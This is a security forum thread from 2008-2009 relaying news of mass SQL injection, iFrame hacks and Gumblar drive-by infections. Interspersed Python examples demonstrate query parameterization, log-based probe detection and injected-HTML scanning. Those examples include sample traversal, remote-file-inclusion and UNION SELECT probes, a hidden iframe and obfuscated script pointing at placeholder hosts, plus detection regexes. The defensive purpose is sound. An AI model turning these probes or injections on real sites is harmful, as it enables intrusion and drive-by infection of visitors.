
SQL injection attacks...


111 replies to this topic

#46 AplusWebMaster

  • Authentic Member
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 01 December 2008 - 12:40 PM

FYI...

CBS website iFrame hack
- http://www.infoworld...ame_hack_1.html
December 01, 2008 - "TV network CBS has become the latest big name to have its website used to host malware, a security company has reported. It appears that Russian malware distributors were able to launch another iFrame attack on a sub-domain of the cbs.com site so that it was serving remote malware to any visitors. A user's vulnerability to the malware attack launched by the site hack would depend on a number of factors, including the type of security used on a PC, the operating system, and possibly the browser version... Finjan had informed CBS of the issue, but that the Russian exploit server had in any case been taken offline, neutering the attack for the time being..."

:ph34r:

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.



#47 AplusWebMaster

Posted 24 December 2008 - 04:46 AM

FYI...

Mass Injection on John Sands Greeting Card Company site
- http://securitylabs....lerts/3268.aspx
12.23.2008 - "Websense... has discovered that the Web site of John Sands Greeting Card Company is infected with a mass JavaScript injection that delivers a malicious payload. Multiple pages on the site have been found to contain the said malicious code... Acquired by American Greetings in 1996, the company was founded in 1837 by John Sands, the son of an English engraver. The company is Australia's second oldest registered company. In an effort to protect their visitors, Websense Security Labs has contacted John Sands Greeting Card Company and advised them on this incident..."

(Screenshot available at the Websense URL above.)

:ph34r: :ph34r:



#48 AplusWebMaster

Posted 31 December 2008 - 01:42 PM

FYI...

Multiple Chinese sites compromised...
- http://securitylabs....ent/alerts.aspx
12.31.2008 - Chinese Government Affairs Information Site Compromised...
12.29.2008 - Download Site of China.com Compromised - Malicious Web Site / Malicious Code
12.26.2008 - Sohu Web Site in China Compromised - Malicious Web Site / Malicious Code...

:ph34r: <_<

Edited by AplusWebMaster, 31 December 2008 - 01:43 PM.



#49 AplusWebMaster

Posted 13 January 2009 - 10:08 AM

FYI...

Paris Hilton website infected with malware
- http://www.informati...cleID=212800229
January 12, 2009 - "Once again, hackers have targeted technology associated with Paris Hilton. This time it's her Web site, ParisHilton .com. Security researchers at ScanSafe report that anyone visiting Hilton's site risks infection with malware. "Hilton's popular website, ParisHilton .com, has been outfitted with malware prompting site visitors to 'update' their system in order to continue navigating the site," ScanSafe said in an e-mail. "When the bogus pop-up box appears, users have the option to click 'Cancel' or 'OK.' Regardless of which option they choose, destructive malware will be downloaded to the user's computer"... ScanSafe says the malware has been detected on some 15,000 other Web sites. The company says it found a similar threat, a malicious ad, on Major League Baseball's MLB.com last week. "Paris Hilton's site is currently compromised," said Mary Landesman, senior security researcher at ScanSafe, in a phone interview. "We first encountered it on [Jan. 9]. We don't know when it happened." According to Landesman, there's an iFrame that has been embedded in the ParisHilton .com Web site. The iFrame calls out to a site hosting the malware, you69tube .com. It downloads a malicious PDF and attempts to force users into clicking and launching the PDF, which attempts to activate an exploit. Because the malware tries to download additional files whether one clicks "Cancel" or "OK," Landesman says that only a hard quit - CTRL+ALT+Delete - of one's browser provides a way out..."

- http://www.f-secure....s/00001581.html
January 15, 2009 - "... The offending IFrame appears to have been removed at this time... The infection of "Paris Hilton" highlights a popular trend among online attackers..."

:ph34r:

Edited by AplusWebMaster, 15 January 2009 - 09:25 AM.



#50 AplusWebMaster

Posted 27 January 2009 - 05:19 AM

FYI...

"Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system... list of domains used in the mass SQL injections that insert malicious javascript into websites..."

Full list of Injected Sites
- http://www.shadowser...ql-inj-list.txt
Last Updated: 01/23/09 09:12:21 -0700


:ph34r: :ph34r:

Edited by AplusWebMaster, 27 January 2009 - 05:26 AM.



#51 AplusWebMaster

Posted 27 January 2009 - 10:36 AM

FYI...

IEC website compromised
- http://securitylabs....lerts/3289.aspx
01.27.2009 - "Websense... has discovered that a subdomain of the International Electrotechnical Commission (IEC) Web site has been compromised. The IEC is an international standards organization that prepares and publishes International Standards for all electrical, electronic, and related technologies... The infected subdomain belongs to the TC26 group. Unprotected users would be subjected to execution of obfuscated Javascript that -redirects- to an exploit site, hosting exploits for Internet Explorer, QuickTime and AOL SuperBuddy. Successful execution of the exploit code incurs a drive-by download. This installs a backdoor on the compromised machine. Major antivirus vendors are -not- detecting this payload..."

(Screenshots available at the URL above.)

:ph34r: :ph34r:



#52 AplusWebMaster

Posted 28 January 2009 - 02:23 PM

FYI...

- http://www.pcmag.com...,2339712,00.asp
01.27.09 Larry Seltzer - "...AVG has released research that indicates the number and volatility of web sites serving malicious code is increasing dramatically... Almost 60% of these sites are up for less than one day. The goal of these techniques seems to be to defeat blacklist-based protections. AVG calls them transient threats. What are these web pages? Few are actually put up to serve malware. Some of them are blog comments, some are advertisements, many are legitimate web sites corrupted through HTML/script injection, and many have been corrupted through compromises of SQL servers through SQL injection. These compromised web sites are tricked into redirecting users to the few sites that directly serve the malware. The combination of the Apache web server and PHP scripting engine are a favorite target of attackers. There are large numbers of vulnerabilities for attackers to exploit and no automated patch system to make sure servers are protected... The actual malware being served varies from fake codecs, game password-stealing attacks to fake anti-spyware. The fake codec sites are the most volatile, with 62% active for less than a day. The fake anti-spyware sites are more stable, but 28% are active less than a day and the average is less than 2 weeks..."

:ph34r: <_<

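The AVG summary above says many of the redirecting sites were corrupted through SQL injection against their database servers. The defect behind that class of compromise is request input pasted into SQL text, so the database parses attacker-controlled data as part of the query. The following Python is an added example, not code from the article, AVG, or this thread: it builds a constructed in-memory SQLite table (the `news` table, its columns and sample rows are assumptions) and contrasts the concatenating query with a parameterized one. A legitimate apostrophe in a title is enough to expose the broken boundary: the concatenated query fails because the input is being read as SQL, while the bound parameter is treated purely as data, and a stored value containing markup stays a literal string the query never interprets.

```python
import sqlite3


def build_demo_db():
    """Constructed in-memory database standing in for a site's content DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news (title, body) VALUES (?, ?)",
        [
            ("Welcome", "Constructed sample article."),
            ("O'Reilly interview", "Constructed sample article with an apostrophe in the title."),
        ],
    )
    return conn


def search_unsafe(conn, term):
    """Vulnerable pattern: the request value is concatenated into the SQL text,
    so whatever the client sends becomes part of the query grammar."""
    sql = "SELECT id, title FROM news WHERE title = '" + term + "'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Hardened pattern: the value travels as a bound parameter and can never
    change the shape of the statement, whatever characters it contains."""
    return conn.execute("SELECT id, title FROM news WHERE title = ?", (term,)).fetchall()


def demo():
    """Run both query styles and return the observations as a dict."""
    conn = build_demo_db()
    results = {}
    results["safe_plain"] = search_safe(conn, "Welcome")
    results["unsafe_plain"] = search_unsafe(conn, "Welcome")

    # A legitimate apostrophe shows the broken boundary: the concatenated query
    # reads it as SQL syntax and fails; the bound parameter treats it as data.
    try:
        search_unsafe(conn, "O'Reilly interview")
        results["unsafe_apostrophe"] = "ok"
    except sqlite3.OperationalError:
        results["unsafe_apostrophe"] = "sql_error"
    results["safe_apostrophe"] = search_safe(conn, "O'Reilly interview")

    # With binding, a value that happens to contain markup is stored and
    # returned as the literal string; the database never interprets it.
    # (example.invalid is a placeholder host.) Escaping for HTML output is the
    # view layer's job and a separate control from query parameterization.
    markup_value = '<script src="http://example.invalid/x.js"></script>'
    conn.execute("UPDATE news SET body = ? WHERE id = ?", (markup_value, 1))
    stored = conn.execute("SELECT body FROM news WHERE id = 1").fetchone()[0]
    results["stored_literal"] = stored == markup_value
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

`demo()` returns the observations rather than printing them, so the same function can back a regression test. The design point is that binding keeps input outside the SQL grammar, which is the fix for the whole injection class; input filtering on top of concatenation is not.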


#53 AplusWebMaster

Posted 30 January 2009 - 09:04 AM

FYI... (It appears the hacks have been busy - CYA)

"Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system... list of domains used in the mass SQL injections that insert malicious javascript into websites..."

Full list of Injected Sites
- http://www.shadowser...ql-inj-list.txt
Last Updated: 01/29/09 14:02:09 -0700


:ph34r: :ph34r: :ph34r:



#54 AplusWebMaster

Posted 03 February 2009 - 11:57 AM

FYI...

- http://www-935.ibm.c...?cntxt=a1030786
02 Feb 2009 - "... Web sites have become the Achilles' heel for corporate IT security. Attackers are intensely focused on attacking Web applications so they can infect end-user machines. Meanwhile, corporations are using off-the-shelf applications that are riddled with vulnerabilities; or even worse, custom applications that can host numerous unknown vulnerabilities that can't be patched. Last year more than half of all vulnerabilities disclosed were related to Web applications, and of these, more than 74 percent had no patch. Thus, the large-scale, automated SQL injection vulnerabilities that emerged in early 2008 have continued unabated. By the end of 2008, the volume of attacks jumped to 30 times the number of attacks initially seen this summer...
Although attackers continue to focus on the browser and ActiveX controls as a way to compromise end-user machines, they are turning their focus to incorporate new types of exploits that link to malicious movies (for example, Flash) and documents (for example, PDFs). In the fourth quarter of 2008 alone, IBM X-Force traced more than a 50 percent increase in the number of malicious URLs hosting exploits than were found in all of 2007. Even spammers are turning to known Web sites for expanded reach. The technique of hosting spam messages on popular blogs and news-related websites more than doubled in the second half of this year..."

:ph34r: :( :ph34r:



#55 AplusWebMaster

Posted 08 February 2009 - 12:02 PM

FYI...

Kaspersky USA site hacked...
- http://www.theregist...promise_report/
8 February 2009 - "A security lapse at Kaspersky has exposed a wealth of proprietary information about the anti-virus provider's products and customers, according to a blogger*, who posted screen shots and other details that appeared to substantiate the claims. In a posting made Saturday, the hacker claimed a simple SQL injection gave access to a database containing "users, activation codes, lists of bugs, admins, shop, etc." Kaspersky has declined to comment... The Register will be updating this story as warranted..."
* http://hackersblog.o...-sql-injection/

:smack: :ph34r: <_<



#56 AplusWebMaster

Posted 27 February 2009 - 10:53 AM

FYI...

500,000 Websites Hit By New Form Of SQL Injection In '08
- http://www.darkreadi...cleID=214600046
Feb. 25, 2009 - "...An automated form of SQL injection using botnets emerged as the popular method of hacking Websites, according to a newly released report from the Web Hacking Incidents Database (WHID), an annual report by Breach Security and overseen by the Web Application Security Consortium (WASC). The report also found that attackers increasingly are targeting a Website's customers rather than the sensitive information in the site's database... Mass SQL Injection Bot attacks basically automate the infection process; the Nihaorr1 and Asprox botnets both deployed this method last year, according to the report... Government, security, and law enforcement organizations represented the biggest sector suffering from these attacks (32 percent), but that may, in part, be due to their more stringent disclosure rules, the report says. Next were information services (13 percent), finance (11 percent), retail (11 percent), Internet (9 percent), and education (6 percent)..."
* http://www.breach.co...s/2008WHID.html

:ph34r: :ph34r: :ph34r:

Edited by AplusWebMaster, 27 February 2009 - 10:55 AM.



#57 AplusWebMaster

Posted 29 April 2009 - 11:05 AM

FYI...

DNS redirect attack - Puerto Rico
- http://news.cnet.com...0228436-83.html
April 27, 2009 - "... A group calling itself the "Peace Crew" claimed that they used a SQL injection attack to break into the Puerto Rico registrar's management system... While the sites that visitors were -redirected- to were obviously not the legitimate sites, DNS redirects could be used to send unsuspecting Web surfers to phishing sites pretending to be banks where they would be prompted to provide sensitive information. People should use the SSL (Secure Sockets Layer) protocol for encrypting communications with sensitive sites and use anti-phishing technology in the browser that colors part of the URL address bar green or red based on the safety level of the site being visited..."

(Screenshot available at the URL above.)

:( :ph34r:



#58 AplusWebMaster

Posted 30 April 2009 - 04:20 AM

FYI...

SQL injections through Search Engine reconnaissance...
- http://ddanchev.blog...ugh-search.html
April 29, 2009 - "From the lone Chinese SQL injectors empowered with point'n'click tools for massive SQL injection attacks, to the much more efficient and automated botnet approach courtesy of, for instance, the ASProx botnet. The process of automatically fetching URLs from public search engines in order to build hit lists for verifying against remote file inclusion attacks and potential SQL injections, remains a commodity feature in a great number of newly released malware bots... A recently released malware bot is once again empowering the average script kiddie with the possibility to take advantage of the window of opportunity for each and every remotely exploitable web application flaw... Moreover, the IRC based bot is also featuring a console which allows manual exploitation or intelligence gathering for a particular site. Some of the features include:
- Remote file inclusion
- Local file inclusion checks ()
- MySQL database details
- Extract all database names
- Data dumping from column and table
- Notification issued when Google bans the infected host for automatically using it
... The window of opportunity for abusing a particular web application flaw is abused much more efficiently due to the fact that reconnaissance data about its potential exploitability is already crawled by a public search engine - often in real time. The concept, as well as the features within the bot are not rocket science - that's what makes it so easy to use."

:angry: :ph34r:

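The bot described above builds hit lists from search engine results and then tests each URL for remote file inclusion, local file inclusion and SQL injection. From the server side that traffic shows up in the access log as a spray of probe-shaped query strings across several different scripts from one client. The following Python is an added example, not code from Danchev's post or from the bot it describes: it parses constructed Apache combined-log style lines (203.0.113.9 and 198.51.100.7 are documentation addresses), classifies each query-parameter value with a small set of illustrative signatures, and reports clients whose flagged requests span several distinct scripts. The log layout, the signature list and the threshold are assumptions chosen for the example, not a complete ruleset.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlparse

# Constructed Apache combined-log style lines. 203.0.113.9 behaves like the
# search-engine-fed probe bot; 198.51.100.7 is an ordinary visitor.
SAMPLE_LOG = """\
198.51.100.7 - - [29/Apr/2009:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120
203.0.113.9 - - [29/Apr/2009:10:01:05 +0000] "GET /index.php?page=http://203.0.113.9/x.txt HTTP/1.1" 200 5120
203.0.113.9 - - [29/Apr/2009:10:01:06 +0000] "GET /gallery/view.php?img=../../../../etc/passwd HTTP/1.1" 404 310
203.0.113.9 - - [29/Apr/2009:10:01:07 +0000] "GET /news.php?id=1%20UNION%20SELECT%201,2,3%20FROM%20information_schema.tables HTTP/1.1" 500 220
198.51.100.7 - - [29/Apr/2009:10:02:00 +0000] "GET /news.php?id=42 HTTP/1.1" 200 4000
"""

# Client IP, two ident/user fields, bracketed timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)


def classify_param(value):
    """Tag one query-parameter value with the probe classes it resembles.
    Illustrative signatures only; production rulesets are far larger."""
    v = unquote(value).lower()  # second decode catches double-encoded probes
    tags = set()
    if re.match(r"(https?|ftp)://", v):
        tags.add("rfi")   # remote file inclusion: a URL where a page name belongs
    if "../" in v or "/etc/passwd" in v or "\x00" in v:
        tags.add("lfi")   # local file inclusion / directory traversal
    if re.search(r"\bunion\b.*\bselect\b", v) or "information_schema" in v:
        tags.add("sqli")  # enumeration-style SQL injection (database/table listing)
    return tags


def parse_line(line):
    """Parse one log line into a record with the probe tags of its parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parsed = urlparse(m.group("target"))
    tags = set()
    for _, value in parse_qsl(parsed.query, keep_blank_values=True):
        tags |= classify_param(value)
    return {"ip": m.group("ip"), "path": parsed.path,
            "status": int(m.group("status")), "tags": tags}


def find_probing_hosts(lines, min_distinct_paths=3):
    """Clients whose flagged requests span several scripts: the hit-list pattern,
    as opposed to a single odd request that may be a false positive."""
    per_ip = defaultdict(lambda: {"paths": set(), "tags": set(), "hits": 0})
    for line in lines:
        rec = parse_line(line)
        if not rec or not rec["tags"]:
            continue
        entry = per_ip[rec["ip"]]
        entry["paths"].add(rec["path"])
        entry["tags"] |= rec["tags"]
        entry["hits"] += 1
    return {ip: e for ip, e in per_ip.items() if len(e["paths"]) >= min_distinct_paths}


if __name__ == "__main__":
    for ip, e in find_probing_hosts(SAMPLE_LOG.splitlines()).items():
        print(ip, sorted(e["tags"]), e["hits"], "flagged requests over", len(e["paths"]), "scripts")
```

Grouping by client and counting distinct scripts is what separates the automated hit-list behaviour from a single stray request; the per-request signatures alone are noisy and easy to evade, so they are best treated as a trigger for the per-host view rather than as a verdict.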


#59 AplusWebMaster

Posted 15 May 2009 - 05:42 AM

FYI...

- http://preview.tinyurl.com/rbxxwa
May 14, 2009 PC World - "A new round of website hijacks is attempting to install malicious, Google-focused software on unpatched PCs, according to security company ScanSafe, further cementing the drive-by-download approach as a bad-guy tactic of choice. The attack, dubbed "Gumblar" by ScanSafe*, starts by hijacking legitimate sites and inserting attack code. The more than 1,500 hacked sites, including Tennis.com and Variety.com, don't represent an especially huge number, but it's growing rapidly. Since last week, the attack has grown by 80 percent, according to the company, and has spiked 188 percent since yesterday.
The inserted attack code attempts to identify old, unpatched vulnerabilities on a victim PC that browses a hacked site, and will take advantage of any discovered hole to install malware. These kinds of drive-by-download attacks are sneaky and dangerous, but the good news is that while the actual exploits used vary as time passes, the company says none have yet gone after zero-day holes that don't yet have a fix available. The attack code has largely gone after PDF and Flash flaws discovered in the last year..."
* http://blog.scansafe...gumblar-qa.html

- http://www.theregist..._web_infection/
14 May 2009 - "... The exploit code is unique for every website, making it impossible to identify a compromised site until someone has accidentally surfed there. It uses obfuscated Javascript that's burrowed deep into a website's source code to exploit unpatched vulnerabilities in a visitor's Adobe Flash and Reader programs. Victims then join a botnet that manipulates their Google search results... By injecting ads and links into certain searches, infected users see results that are different than they would otherwise be..."

- http://www.darkreadi...cleID=217500218
May 14, 2009 - "... difficult to find and bring down... its source IP addresses have been traced to Latvia and Russia, and its servers are located in the U.K..."

Gumblar .cn exploit
- http://preview.tinyurl.com/r5cplm
07 May 09 (Unmask Parasites blog)

More Facts about the Gumblar attack
- http://preview.tinyurl.com/qg5c8d
15 May 09 (Unmask Parasites blog)

Troj/JSRedir-R attacks
- http://www.sophos.co...abs/v/post/4422
May 14, 2009

http://google.com/sa...ite=gumblar.cn/
"... Malicious software includes 24 scripting exploit(s), 6 trojan(s)... site has hosted malicious software over the past 90 days. It infected 12799 domain(s)..."

:ph34r: :ph34r:

Edited by AplusWebMaster, 18 May 2009 - 07:49 AM.
Added Dark Reading and Google diag link...

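The Gumblar reports above describe obfuscated JavaScript buried in a site's own source and a script pointing at an external domain, and earlier posts in this thread describe injected iFrames. A site owner checking pages for these artifacts needs something that walks the HTML and flags those three shapes. The following Python is an added example, not code from ScanSafe, Sophos, Unmask Parasites or The Register: it scans a constructed sample page (example.invalid is a placeholder host, and `www.example.org` is the assumed legitimate script host) for hidden or zero-sized iframes, script tags whose `src` host is not on the site's own allowlist, and inline scripts that combine decode-and-execute calls with long escaped or numeric payloads. The heuristics are illustrative; since the exploit code is unique per site, as the Register piece notes, the allowlist of known-good script sources is the more durable of the three checks.

```python
import re
from urllib.parse import urlparse

# Constructed sample page: a site-relative script, a benign inline script, then
# an injected external script tag, a hidden iframe and an obfuscated inline
# script of the kind the articles above describe. example.invalid is a
# placeholder host, not a real attacker domain.
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script>function show(){document.getElementById('x').style.display='block';}</script>
<script src="http://example.invalid/rss/?id=1"></script>
</head><body>
<iframe src="/video.html" width="640" height="360"></iframe>
<p>Constructed page body.</p>
<iframe src="http://example.invalid/in.php" width="0" height="0" style="display:none"></iframe>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%78%22%29'))</script>
</body></html>"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
# Iframe hiding tricks: CSS hiding or a zero-sized frame.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
ZERO_SIZE = re.compile(r"""\b(width|height)\s*=\s*["']?0(?:px)?["'\s/>]""", re.I)
# Obfuscation indicators: decode-and-execute calls, long runs of escaped bytes,
# long numeric character-code lists. Two of the three must co-occur to flag.
OBF_CALLS = re.compile(r"\b(eval|unescape|String\.fromCharCode)\s*\(", re.I)
ESCAPE_RUN = re.compile(r"(?:%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}){8,}", re.I)
CHARCODE_LIST = re.compile(r"(?:\d{2,3}\s*,\s*){20,}")


def scan_html(html, own_hosts):
    """Return a list of (kind, evidence) findings for one HTML document.
    own_hosts: lowercase hostnames the site legitimately loads scripts from;
    site-relative src values have no host and are always accepted."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        tag = m.group(0)
        if HIDDEN_STYLE.search(tag) or ZERO_SIZE.search(tag):
            findings.append(("hidden_iframe", tag[:80]))
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:
            host = urlparse(src.group(1)).hostname
            if host and host.lower() not in own_hosts:
                findings.append(("external_script", src.group(1)))
            continue
        score = sum(1 for rx in (OBF_CALLS, ESCAPE_RUN, CHARCODE_LIST) if rx.search(body))
        if score >= 2:
            findings.append(("obfuscated_script", body.strip()[:80]))
    return findings


if __name__ == "__main__":
    for kind, evidence in scan_html(SAMPLE_HTML, {"www.example.org"}):
        print(kind, "->", evidence)
```

To check a live site, feed each served page (and each template and include on disk, since the injection in these reports lived in the site's own files) through `scan_html` with the site's real script hosts in `own_hosts`, and review every finding by hand; a scanner like this finds injected artifacts, but it does not tell you how the attacker got write access, which is the question the next post raises.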


#60 AplusWebMaster

Posted 18 May 2009 - 01:50 PM

More...

- http://isc.sans.org/...ml?storyid=6403
Last Updated: 2009-05-18 17:54:18 UTC - "... Gumblar/JSRedir-R drive-bys. Although this malware has been around for a while, several A/V vendors and some relatively mainstream news outlets have recently reported a large increase in websites injected with JSRedir-R/Gumblar. According to Sophos* this malware accounted for approximately 42% of all infected websites detected in the last week, nearly 6 times its closest rival. Although the infection method is not clear, given the variety of servers and platforms, it is most likely weak login credentials..."
* http://www.sophos.co...ware-threat-web
May 14, 2009

:ph34r: :ph34r:
